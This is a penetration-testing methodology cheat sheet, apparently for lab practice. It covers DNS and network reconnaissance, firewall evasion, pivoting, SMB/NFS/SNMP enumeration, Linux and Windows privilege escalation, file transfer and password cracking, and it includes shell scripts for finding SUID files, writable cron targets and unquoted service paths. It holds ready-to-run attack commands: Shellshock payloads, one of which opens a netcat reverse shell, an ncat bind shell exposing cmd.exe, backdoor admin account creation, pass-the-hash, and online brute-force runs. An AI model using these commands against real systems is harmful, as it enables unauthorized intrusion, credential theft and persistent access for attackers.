Methodology

DNS

☐ nslookup site.com
☐ nslookup -query=mx site.com
☐ nslookup -query=ns site.com
☐ nslookup -query=any site.com

☐ host -t ns site.com
☐ host -l site.com ns2.site.com * zone transfer (AXFR) against one specific nameserver

☐ dig site.com
☐ dig site.com A
☐ dig +nocmd site.com MX +noall +answer
☐ dig +nocmd site.com NS +noall +answer
☐ dig +nocmd site.com A +noall +answer
☐ dig @dns_server.com site.com AXFR +nocmd +noall +answer * zone transfer; try every authoritative server, one may allow AXFR while the others refuse

☐ dnsrecon -d thinc.local -n 10.11.1.220 -t axfr -r 10.11.1.0/24
☐ dnsrecon -d site.com

Brute Force

☐ fierce -dns site.com
☐ fierce -dns site.com -dnserver ns1.site.com

☐ dnsenum site.com --dnsserver ns1.site.com
☐ dnsenum site.com -f /root/hostlist.txt

☐ dnsmap site.com

Network Scanning

☐ route * Linux
☐ route print * Windows
☐ arp
☐ arp-scan -l
☐ netdiscover -i eth0

☐ nmap -sn 10.11.1.* -sn = ping sweep only, no port scan
☐ nmap -sL 10.11.1.* -sL = list scan: reverse-DNS each target, sends nothing else (-Pn elsewhere = skip host discovery, treat every host as online)
☐ nbtscan -r 10.11.1.0/24 -n = no DNS
☐ smbtree
☐ hping3 -S --scan 1-1000 IP * SYN scan
☐ hping3 -S --scan '80,443,445,8080' IP
☐ hping3 --scan 1-1000 IP * NULL scan (no flags set)
☐ hping3 -2 --scan 1-1000 IP -V * UDP scan (-2 = UDP mode)
☐ hping3 -F -P -U -p 80 IP -c 3 -V * XMAS scan (FIN, PUSH, URG)

☐ masscan -p80,22,21,23,8080,10000 10.0.1.21 -e tun0 --rate <packets/sec> * interface is -e (or --interface); keep --rate low over a VPN, masscan does not retransmit and drops are silent

Individual Host Scanning

☐ nmap --top-ports 20 --open -iL iplist.txt
☐ nmap -O --osscan-guess IP * aggressive OS guess
☐ nmap -A -p- -T4 IP
☐ nmap -sS -A -sV -O -p- IP
☐ nmap -sU IP * UDP is slow; scope the ports
☐ nmap -sU -T4 -p <port> IP --max-retries 0
☐ hping3 -S IP -p 80 -c 4

Firewall / IDS Evasion

☐ nmap -sS -f IP * packet fragmentation
☐ nmap -sS -D decoy1,decoy2,decoy3,ME targetIP * NOTE: decoys only work with raw-packet scans, not with -sT or -sV (those complete full TCP connections from your real address)
☐ nmap -sS -D 192.168.1.1,ME,192.168.1.23 targetIP * ME is the literal word ME; it sets where your real address sits in the decoy order
☐ nmap -sS --source-port 53 IP * use a source port the firewall lets through (DNS, HTTP)
☐ nmap -sS -g 80 10.10.10.24
☐ nmap -sS -g 53 -p 53 10.10.14.23
☐ nmap -sS -D RND:10 192.168.2.23 -p 80 -Pn --disable-arp-ping * 10 random decoys
☐ nmap -sS --spoof-mac apple 192.168.2.1 -p 80 -Pn --disable-arp-ping -n * random MAC with a vendor prefix
☐ nmap --spoof-mac <MAC> 192.168.2.1 -p 80 -Pn --disable-arp-ping -n

PIVOTING

When scanning through a SOCKS pivot (proxychains), use TCP connect scans only (-sT) with -Pn and -n: a SOCKS proxy carries complete TCP streams, so raw-packet scans (SYN, UDP, ICMP host discovery) and OS detection either fail or silently give wrong results.

☐ proxychains nmap -sT -sV -n -Pn 192.168.78.25
☐ proxychains nmap -A -p 80,135,139,445,1101 10.185.10.55 -Pn * -A also turns on -O and --traceroute, which need raw sockets and will not work through the proxy
☐ proxychains nmap -T5 --top-ports 20 -sT -Pn 192.168.0.24
☐ proxychains nmap -sT -Pn -n 10.10.10.5 --top-ports 50

☐ ssh -f -N -D 127.0.0.1:8080 -p 2222 hax0r@127.0.0.1 * SOCKS proxy on local 8080, going out through the reverse tunnel below
• netstat -lntp * confirm the listener is up
☐ ssh -f -N -R 2222:127.0.0.1:22 root@192.168.13.222 * run on the pivot: exposes its SSH on attacker port 2222

☐ sshpass -pMYPASSWORD sshuttle -r user@192.168.1.2 192.168.0.0/24 10.0.0.0/24 * -p shows the password in the process list (ps); sshpass -e reads it from $SSHPASS instead

Service Scanning

WebApp

☐ view source
☐ cewl
☐ nikto
☐ dirb
☐ gobuster
☐ dirbuster
☐ dirsearch
• ./dirsearch.py -u http://192.168.13.29/ -e cgi -r
☐ wpscan
☐ dotdotpwn

☐ davtest / cadaver
☐ droopescan
☐ joomscan
☐ LFI / RFI test
☐ SQLi
☐ XSS
☐ Shellshock
• env x='() { :;}; echo vulnerable' bash -c "echo this is a test" * local bash check; prints "vulnerable" on an unpatched bash
• User-Agent: () { :;}; ping -c 5 -p unique_string attacker.machine * blind check through CGI; watch for the ICMP with tcpdump
• wget -U "() { foo;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://192.168.13.29/cgi-bin/login.cgi && cat login.cgi
• wget -U "() { foo;};echo; /bin/nc 192.168.13.18 1234 -e /bin/sh" http://192.168.13.29/cgi-bin/login.cgi * reverse shell; start the listener first (nc -nvlp 1234)

Linux\Windows

☐ snmpwalk -c public -v1 ipaddress 1
• snmpwalk -v 2c 192.168.2.23 -c public

☐ Windows =
• nbtscan -v IP or IP range
• nbtstat -a IP
• net view IP
• net use K: \\192.168.2.23\C
• net use \\192.168.2.23\IPC$ "" /u:"" * null session

☐ smbclient -L //ipaddress -N * -N = no password (null session)
☐ showmount -e ipaddress * showmount takes no port argument; find NFS via rpcinfo / port 111
• kali# mkdir -p /mnt/home/bob
• mount -t nfs ipaddress:/home/bob /mnt/home/bob -o nolock

☐ mount.cifs //192.168.2.23/C /media/K_share/ -o user=,pass=
☐ mkdir /mnt/www
☐ mount -t cifs //192.168.13.26/www /mnt/www
☐ rpcinfo -p ipaddress
☐ rpcclient -N -U "" 192.168.2.23 * null session
• rpcclient $> enumdomusers
• enumalsgroups, srvinfo, lookupnames, queryuser, enumprivs
☐ enum4linux -a ipaddress
☐ smbmap -H 192.168.13.26

☐ SMTP
• smtp-user-enum -M VRFY -U users.txt -t 10.10.10.10
• smtp-user-enum -M EXPN -u admin1 -t 10.10.10.10
• smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt
• smtp-user-enum -M EXPN -D site.com -U users.txt -t 10.10.10.10

Anything Else

nmap scripts (locate "*.nse" | grep servicename)
• nmap --script-updatedb
• nmap --script smb-enum-shares IP -p 445
• nmap --script auth IP * runs every script in the auth category
• nmap --script default IP * runs the default scripts (same as -sC)
• nmap -p 389 --script ldap-search IP
• nmap --script smb-os-discovery -p 445 192.168.13.29
• nmap -sU -p 161 192.168.2.23 --script snmp-brute
• nmap -sU -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=WORDLIST IP
• nmap -sU -p 161 192.168.102.149 --script snmp-brute --script-args snmp-brute.communitiesdb=/usr/share/seclists/Misc/wordlist-common-snmp-community-strings.txt
• nmap --script nfs-ls,nfs-showmount,nfs-statfs -p 111 IP
• nmap --script rpc-grind,rpcinfo 192.168.13.26 -p 111
• nmap --script smtp-commands 192.168.13.26 -p 25
• nmap --script http-shellshock --script-args uri=/cgi-bin/login.cgi 192.168.13.29 -p 80
• nmap --script ssl-heartbleed 192.168.13.58

☐ MSF Aux Modules

☐ Wireshark
• !(arp or icmp or dns)
• http
• http.request
• tcp contains XXX
• tcp.flags.reset==1
• tcp.port==80
• ip.addr==10.10.10.10 && ip.addr==10.10.10.1
• http.request.method == "POST"

☐ Download the software

Exploitation
☐ Gather version numbers

☐ Searchsploit

☐ Default Creds

☐ Creds Previously Gathered

☐ Download the software

Post Exploitation

Linux

☐ lsb_release -a, uname -a, lscpu
☐ ptrace * can you attach to other processes? (kernel.yama.ptrace_scope)
☐ Dump login creds
https://github.com/huntergregal/mimipenguin

☐ linux-local-enum.sh
• wget https://highon.coffee/downloads/linux-local-enum.sh
☐ LinEnum.sh
https://github.com/rebootuser/LinEnum.git
☐ lse.sh
https://github.com/diego-treitos/linux-smart-enumeration.git

• wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh
• curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh

☐ linuxprivchecker.py
https://github.com/sleventyeleven/linuxprivchecker.git
☐ linux-exploit-suggester.sh
https://github.com/mzet-/linux-exploit-suggester.git
☐ unix-privesc-check (shell script)
https://github.com/pentestmonkey/unix-privesc-check.git

☐ FIND EXECUTABLES

• grep -ri "password" . 2>/dev/null * "2>&1 /dev/null" would add /dev/null as a search target instead of silencing errors

• find -type f -executable -exec file -i '{}' \; | grep 'x-executable; charset=binary'

• find / -executable -type f 2>/dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug * binaries outside the usual dirs modified in a given month (change Aug)

• find / -perm -0002 -type f -print 2>/dev/null * world-writable files

• find / -perm -2 ! -type l -ls 2>/dev/null

• find /* -user root -perm -4000 -print 2>/dev/null

• find / -perm -4000 2>/dev/null

• find / -perm -u=s -type f 2>/dev/null

• find / -perm -1000 -type d 2>/dev/null # Sticky bit – Only the owner of the directory or the owner of a file can delete or rename here.

• find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) – run as the group, not the user who started it.

• find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) – run as the owner, not the user who started it.

• find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null # SGID or SUID; without the parentheses -type f only applies to the SUID half

• for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
# find starting at root (/), SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)

• find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null # -maxdepth is a global option and goes before the tests; the parentheses make ! -type l and -exec apply to both halves
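The SUID/SGID one-liners above are easy to get subtly wrong (operator precedence, symlinks, -maxdepth placement). The script below is an added example, not part of the original cheat sheet: it wraps the corrected search in a function and exercises it on a constructed throwaway directory tree (assumption: a writable $TMPDIR), so the behaviour can be checked before the same function is run against / on a target.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet: SUID/SGID hunting with
# correct find(1) precedence. Written without the parentheses, the test
#   -perm -g=s -o -perm -4000 ! -type l
# parses as (-perm -g=s) OR (-perm -4000 AND ! -type l), so SGID symlinks and
# directories leak into the output, and a -maxdepth placed after the tests only
# draws a "global option" warning from GNU find.

# find_setid_files ROOT [MAXDEPTH]
# Regular files under ROOT that are SUID or SGID (-type f already excludes
# symlinks), at most MAXDEPTH (default 3) levels deep; "Permission denied"
# noise is discarded and the list is sorted so two runs can be diffed.
find_setid_files() {
    root=$1
    depth=${2:-3}
    find "$root" -maxdepth "$depth" \( -perm -4000 -o -perm -2000 \) \
        -type f 2>/dev/null | sort
}

# count_setid_files ROOT [MAXDEPTH]: number of hits, handy as a baseline
count_setid_files() {
    find_setid_files "$1" "${2:-3}" | wc -l | tr -d ' '
}

# make_fixture: constructed tree under a temp dir (assumption: $TMPDIR is
# writable). Nothing here is a real system binary.
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/bin" "$d/deep/a/b/c"
    printf '#!/bin/sh\n' > "$d/bin/suid_tool"; chmod 4755 "$d/bin/suid_tool"
    printf '#!/bin/sh\n' > "$d/bin/sgid_tool"; chmod 2755 "$d/bin/sgid_tool"
    printf '#!/bin/sh\n' > "$d/bin/plain";     chmod 0755 "$d/bin/plain"
    ln -s "$d/bin/suid_tool" "$d/bin/suid_link"           # must not be listed
    printf '#!/bin/sh\n' > "$d/deep/a/b/c/buried"         # depth 5: beyond the default cap
    chmod 4755 "$d/deep/a/b/c/buried"
    printf '%s\n' "$d"
}

# Demo run on the fixture; on a target call find_setid_files / instead.
fixture=$(make_fixture)
find_setid_files "$fixture"
rm -rf "$fixture"
```

On a target, compare the output against the distribution's stock SUID list (or a clean box of the same release); anything not on that list is the first thing to feed into searchsploit and GTFOBins.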

Cron Jobs:

☐ /var/spool/cron/crontabs/root * also /etc/crontab, /etc/cron.d/*, /etc/cron.{hourly,daily,weekly,monthly}/ and crontab -l; look for jobs whose script you can write to
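Reading a root crontab is only half the check; the question is whether any program it runs can be replaced by the current user. The following is an added example, not part of the original cheat sheet: a crontab parser plus a hijackability test, run against a constructed crontab and scripts in a temp dir (assumption: a writable $TMPDIR; the user-crontab format without the /etc/crontab user column).

```shell
#!/bin/sh
# Added example, not from the original cheat sheet: parse a crontab and flag
# jobs whose program an unprivileged user could replace. A root cron job that
# runs a world-writable script, or a missing script in a world-writable
# directory, is a direct privilege escalation: plant the payload, wait a tick.

# cron_targets FILE
# Print the program of each job line: skips comments, blank lines and
# VAR=value lines, handles "m h dom mon dow cmd" and "@reboot cmd".
# Assumption: user crontab format; /etc/crontab's extra user column is not
# handled (its command would be in field 7).
cron_targets() {
    awk '
        /^[[:space:]]*#/ { next }
        NF == 0 { next }
        /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }
        $1 ~ /^@/ { print $2; next }
        NF >= 6  { print $6 }
    ' "$1"
}

# hijackable_cron_targets FILE
# For each absolute target print "<path><TAB><reason>" when the file is
# world-writable, or missing from a world-writable directory. Mode bits are
# tested with find(1) instead of [ -w ] so the result is the same whether the
# check runs as root or not; as the low-privilege user, [ -w "$prog" ] would
# additionally catch group-writable and self-owned scripts.
hijackable_cron_targets() {
    cron_targets "$1" | while IFS= read -r prog; do
        case $prog in /*) ;; *) continue ;; esac   # relative names resolve via cron's PATH; skipped here
        if [ -e "$prog" ]; then
            [ -n "$(find "$prog" -maxdepth 0 -perm -0002 2>/dev/null)" ] &&
                printf '%s\t%s\n' "$prog" "world-writable"
        else
            dir=$(dirname "$prog")
            [ -n "$(find "$dir" -maxdepth 0 -type d -perm -0002 2>/dev/null)" ] &&
                printf '%s\t%s\n' "$prog" "missing, directory world-writable"
        fi
    done
}

# make_cron_fixture: constructed crontab plus target scripts in a temp dir.
# Nothing here is a real root crontab; paths and jobs are invented.
make_cron_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/opt" "$d/sbin" "$d/drop"
    printf '#!/bin/sh\necho backup\n' > "$d/opt/backup.sh"; chmod 0777 "$d/opt/backup.sh"
    printf '#!/bin/sh\necho rotate\n' > "$d/sbin/rotate.sh"; chmod 0755 "$d/sbin/rotate.sh"
    chmod 0777 "$d/drop"                      # anyone can create files here
    cat > "$d/crontab" <<EOF
# m h  dom mon dow   command
SHELL=/bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
*/5 * * * * $d/opt/backup.sh >/dev/null 2>&1
0 3 * * *   $d/sbin/rotate.sh
@reboot     $d/drop/agent.sh
0 * * * *   logger hourly tick
EOF
    printf '%s\n' "$d"
}

# Demo run; on a target point it at /var/spool/cron/crontabs/root
fixture=$(make_cron_fixture)
hijackable_cron_targets "$fixture/crontab"
rm -rf "$fixture"
```

Expect two hits from the fixture (backup.sh and the absent agent.sh) and none for rotate.sh. The relative-name case ("logger") is deliberately skipped: whether it is hijackable depends on the PATH line and on which of those directories is writable, which is a separate check.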

Windows

☐ systeminfo * architecture, domain name, hotfixes and so on (meterpreter: sysinfo)

☐ wpc.exe
☐ windows-exploit-suggester.py * feed it the systeminfo output
☐ windows_privesc_check.py
☐ windows-privesc-check2.exe

https://download.sysinternals.com/files/SysinternalsSuite.zip Sysinternals Windows tools

• accesschk.exe -uwcqv "Authenticated Users" * # services writable by Authenticated Users
• accesschk.exe -qwsu "Everyone" c:\ # files and dirs writable by Everyone, recursive
• attrib -s -h -r /s /d *.* # strip system/hidden/read-only attributes recursively
• dir /a:hd C:\folder\ # hidden directories
• dir /a shows hidden files and folders
• dir /a:d shows all directories
• dir /a:h shows all hidden files
Try dir /adh (without the colon) to combine.

• C:\> dir backup* /s /p

Logs to Check

Linux = to do


Windows = to do


Priv Escalation
access internal services (portfwd)

☐ add account
• net user dude pass /ADD
• net localgroup Administrators dude /ADD

Windows

☐ List of exploits
☐ Pass the Hash
• PTH with RDP: xfreerdp /u:admin /d:foocorp /pth:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41 /v:172.16.22.119 * only works when the target has Restricted Admin mode enabled (DisableRestrictedAdmin = 0)
☐ whoami /priv
☐ unquoted service paths
• C:\> wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ * auto-start services outside C:\Windows whose path is not quoted; exploitable when you can write to a directory on that path

• sc qc <service name>
• net start * lists running services
• net share
• net localgroup
• net localgroup Administrators
• net user /domain
• net group "Domain Controllers" /domain

• service --status-all * Linux, not Windows
• wmic service get Caption,StartName,State,pathname
• wmic service where 'Caption like "Remote%" and started=true' get Caption
• msf> use exploit/windows/local/trusted_service_path
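The findstr chain under "unquoted service paths" above lists candidates but not the paths Windows will actually try. As an added example, not part of the original cheat sheet, the script below does the same filtering on Kali over wmic output copied off the target and prints, for each hit, the hijack locations (each space-delimited prefix with .exe appended, which is how the service control manager resolves an unquoted path). Assumptions: the CSV comes from `wmic service get name,pathname,startmode /format:csv`, converted from the UTF-16 that wmic typically writes when redirected, and no PathName contains a comma; the sample rows, host and service names are constructed.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet: unquoted service path
# finder over wmic CSV output copied from the target. On the target:
#   wmic service get name,pathname,startmode /format:csv > svc.csv
# wmic typically writes UTF-16 when redirected, so convert first:
#   iconv -f UTF-16 -t UTF-8 svc.csv > svc.utf8.csv

# unquoted_service_paths CSVFILE
# Prints "<service>\t<executable>\t<hijack path>;<hijack path>..." for every
# auto-start service whose executable path contains a space, is not wrapped in
# quotes and is not under C:\Windows. The hijack paths are the prefixes Windows
# tries, in order; the first one whose directory you can write to wins.
# Assumption: PathName fields contain no commas (wmic does not CSV-quote them).
unquoted_service_paths() {
    tr -d '\r' < "$1" | awk -F, '
        tolower($4) != "auto" { next }        # skips header, blank and non-auto rows
        { path = $3 }
        path ~ /^"/ { next }                  # properly quoted path
        tolower(path) ~ /^c:\\windows\\/ { next }
        {
            n = index(tolower(path), ".exe")
            if (n == 0) next
            exe = substr(path, 1, n + 3)       # drop arguments after the .exe
            if (index(exe, " ") == 0) next     # no space, nothing to abuse
            cnt = split(exe, part, " ")
            cands = ""; prefix = ""
            for (i = 1; i < cnt; i++) {
                prefix = (i == 1) ? part[i] : prefix " " part[i]
                cands = cands (i == 1 ? "" : ";") prefix ".exe"
            }
            print $2 "\t" exe "\t" cands
        }'
}

# make_wmic_fixture: constructed CSV in the layout wmic /format:csv produces
# (blank line, then Node,Name,PathName,StartMode). Everything in it is invented.
make_wmic_fixture() {
    f=$(mktemp)
    cat > "$f" <<'EOF'

Node,Name,PathName,StartMode
WIN-LAB,Spooler,C:\Windows\System32\spoolsv.exe,Auto
WIN-LAB,VulnSvc,C:\Program Files\Vuln App\bin\vulnsvc.exe -k net,Auto
WIN-LAB,SafeSvc,"C:\Program Files\Safe App\safesvc.exe",Auto
WIN-LAB,LazySvc,C:\Program Files\Lazy App\lazy.exe,Manual
WIN-LAB,AgentSvc,C:\Tools\agent.exe,Auto
EOF
    printf '%s\n' "$f"
}

# Demo run; on a real export call unquoted_service_paths svc.utf8.csv
fixture=$(make_wmic_fixture)
unquoted_service_paths "$fixture"
rm -f "$fixture"
```

The fixture yields one line, VulnSvc with hijack paths C:\Program.exe and C:\Program Files\Vuln.exe; check each directory with accesschk or icacls, drop the payload under the first writable one, and restart the service (or wait for a reboot if you lack the service-control right). Manual-start services are filtered like the page's findstr chain does, but are still worth a look if you hold SERVICE_START on them.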

Linux
☐ sudo su
☐ sudo -l
☐ !sh
☐ less (!sh)
☐ more (!sh)
☐ vi/vim (:!sh)
☐ nmap (--interactive then !sh; old nmap versions only)
☐ ftp (!sh)
☐ gdb (!sh)
☐ python
☐ perl
☐ irb
☐ lua
☐ sudo bash
☐ sudo /bin/bash
☐ sudo nmap --interactive
☐ KernelDB
☐ Searchsploit

Compiling Exploits

☐ gcc -m32 -o linuxpriv exploit.c # for 32 bit systems
☐ i586-mingw32msvc-gcc -o sciaccess.exe useradd.c

Final

☐ Dump hashes
☐ Dump SSH Keys
☐ Dump GPP creds
☐ Plain Txt passwords

ADDITIONAL

File Transfers

☐ Netcat :
• C:\Desktop> nc.exe -nvlp 4444 > shell.exe
• root@kali:~# nc -nv 10.11.11.75 4444 < /root/Documents/shell.exe

* Use ncat with --ssl to encrypt the transfer; it helps keep the file from being stopped by AV on the wire
• C:\Desktop> ncat --exec cmd.exe --allow 10.11.0.32 -vnl 4444 --ssl
• Kali:~# ncat -v 10.11.11.75 4444 --ssl

☐ SCP :
• scp file.txt root@10.10.10.14:file.txt * the IP is the machine you are sending the file to

☐ SMB :
• root@box:~# python smbserver.py SHARE /tmp/smb-transfer * impacket; add -smb2support for newer Windows, which refuses SMB1
• C:\Documents and Settings\user>copy \\192.168.2.8\SHARE\test.txt .

☐ RDP :
• root@box:/tmp/smbshare# rdesktop 192.168.2.202 -r disk:share=/tmp/share/
You can log in once you provide the credentials the remote system asks for. Open "My Computer" and the shared folder appears as a network device; double-click it to see every file in /tmp/share/, which you can execute, copy or edit from the remote session.

Passwords and Cracking

Online Cracking

https://hashes.org/search.php
https://hashkiller.co.uk/Cracker/MD5
https://gchq.github.io/CyberChef/

☐ cewl -d 2 -m 5 -w savedfile.txt http://192.168.1.33/

☐ Hydra
• hydra 10.10.10.86 http-post-form -e nsr -t 16 -u -f -m "/login:username=^USER^&password=^PASS^&submit=Login:<login failed string>" -l admin -P darkc0de.txt -vv * form fields are joined with &, and http-post-form needs the third field (failure text, or S=success text) or it cannot tell a hit from a miss
• hydra -l admin -P passwd.txt -v 192.168.19.203 ftp
• hydra -L UserNameFile -P PasswordFile -e ns -t 32 -u -f -m "/login.php:username=^USER^&password=^PASS^&Login=Login:<login failed string>" <IP> http-post-form
• hydra -vV -l admin -P pw/25common.txt 192.168.56.101 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:password incorrect:H=Cookie: security=low; PHPSESSID=<phpsessid>"

☐ Ncrack
• ncrack -v -f --user admin -P passwd.txt rdp://192.168.19.202,CL=1
• ncrack --user fairy -P /root/Desktop/rockyou.txt rdp://10.0.2.4 -vv
• ncrack telnet://10.10.10.130:25
• ncrack ssh://10.10.10.130 telnet://10.10.10.60:218
• ncrack 10.10.10.10,15 -p ssh:50,telnet

☐ Medusa
• medusa -h 192.168.102.149 -M telnet -U username.lst -P password.lst
• medusa -h 192.168.19.203 -u admin -P password.txt -M http -m DIR:/admin -T 20

☐ Patator
• patator ssh_login host=10.0.0.1 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed.'
• patator ssh_login host=192.168.102.155 user=FILE0 password=FILE1 0=username.lst 1=password.lst

☐ JTR

• unshadow passwd shadow > file_to_crack
• ./john --single file_to_crack
• ./john --wordlist=location_of_dictionary_file --rules file_to_crack
• ./john --show file_to_crack
• ./john --incremental=All file_to_crack
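What unshadow actually does is a join on the username, and a common waste of cracking time is feeding it locked (*, !, !!) and system accounts. The following is an added example, not part of the original cheat sheet or of John the Ripper: the join in portable awk, a scheme detector for the hash prefix so the right --format can be chosen, and a filter that keeps only crackable lines. The passwd/shadow lines are constructed and the hash bodies are placeholders, not real crypt(3) output.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet: unshadow in awk, plus a
# pass that separates crackable hashes from locked accounts and names the
# crypt(3) scheme so john can be given --format instead of guessing.

# unshadow_sh PASSWD SHADOW
# Replace field 2 of each passwd line with the hash from shadow for the same
# user; users absent from shadow are printed unchanged. Same layout john
# expects from `unshadow passwd shadow`.
unshadow_sh() {
    awk -F: -v OFS=: '
        NR == FNR { hash[$1] = $2; next }   # first file: shadow
        ($1 in hash) { $2 = hash[$1] }      # second file: passwd
        { print }
    ' "$2" "$1"
}

# hash_scheme HASHFIELD -> scheme name, or "locked" / "unknown"
# Prefix table: $1$ md5crypt, $5$ sha256crypt, $6$ sha512crypt,
# $y$ yescrypt (john: --format=crypt, via libcrypt), $2a$/$2b$/$2y$ bcrypt.
hash_scheme() {
    case $1 in
        ''|'*'*|'!'*)             echo locked ;;      # *, !, !! or ! in front of a hash
        '$1$'*)                   echo md5crypt ;;
        '$5$'*)                   echo sha256crypt ;;
        '$6$'*)                   echo sha512crypt ;;
        '$y$'*)                   echo yescrypt ;;
        '$2a$'*|'$2b$'*|'$2y$'*)  echo bcrypt ;;
        *)                        echo unknown ;;     # "x", "NP" and similar
    esac
}

# crackable_lines PASSWD SHADOW
# Unshadowed lines for accounts that actually carry a hash, with the scheme
# appended after a tab, so locked and system accounts never reach the cracker.
crackable_lines() {
    unshadow_sh "$1" "$2" | while IFS= read -r line; do
        h=$(printf '%s\n' "$line" | cut -d: -f2)
        s=$(hash_scheme "$h")
        case $s in locked|unknown) continue ;; esac
        printf '%s\t%s\n' "$line" "$s"
    done
}

# make_shadow_fixture: constructed passwd/shadow pair in a temp dir
# (assumption: writable $TMPDIR). Hash bodies are placeholders, not real.
make_shadow_fixture() {
    d=$(mktemp -d)
    cat > "$d/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bob:x:1000:1000:Bob Example:/home/bob:/bin/bash
svc:x:1001:1001::/var/svc:/bin/false
EOF
    cat > "$d/shadow" <<'EOF'
root:$6$saltsalt$PLACEHOLDERHASHNOTREAL:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
bob:$1$abcdefgh$PLACEHOLDERNOTREAL:19000:0:99999:7:::
svc:!$6$othersalt$PLACEHOLDERLOCKED:19000:0:99999:7:::
EOF
    printf '%s\n' "$d"
}

# Demo run; on loot from a target: crackable_lines passwd shadow | cut -f1 > file_to_crack
fixture=$(make_shadow_fixture)
crackable_lines "$fixture/passwd" "$fixture/shadow"
rm -rf "$fixture"
```

From the fixture only root (sha512crypt) and bob (md5crypt) survive; daemon has no password and svc is locked with a leading !, which john would otherwise silently skip or misparse. Group the survivors by scheme and run john once per --format; mixing formats in one file makes john pick one and drop the rest.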

☐ FCRACKZIP

• 7z l -slt /root/Desktop/personal.zip * check the archive properties (method, encryption) before cracking

• fcrackzip -v -D -u -p /root/Desktop/rockyou.txt /root/Desktop/flag-zip3.zip * -D = dictionary from the -p file; -u = unzip to verify and drop false positives (-b is brute force and does not take a wordlist)
• fcrackzip -D -p '/usr/share/wordlists/rockyou.txt' '/root/flag-gold.zip' -v -u
• fcrackzip -v -D -u -p tommy.list t0msp4ssw0rdz.zip
• fcrackzip -v -u -l 4-8 -c aA1 /root/locked.zip * brute force 4-8 chars, lower/upper/digits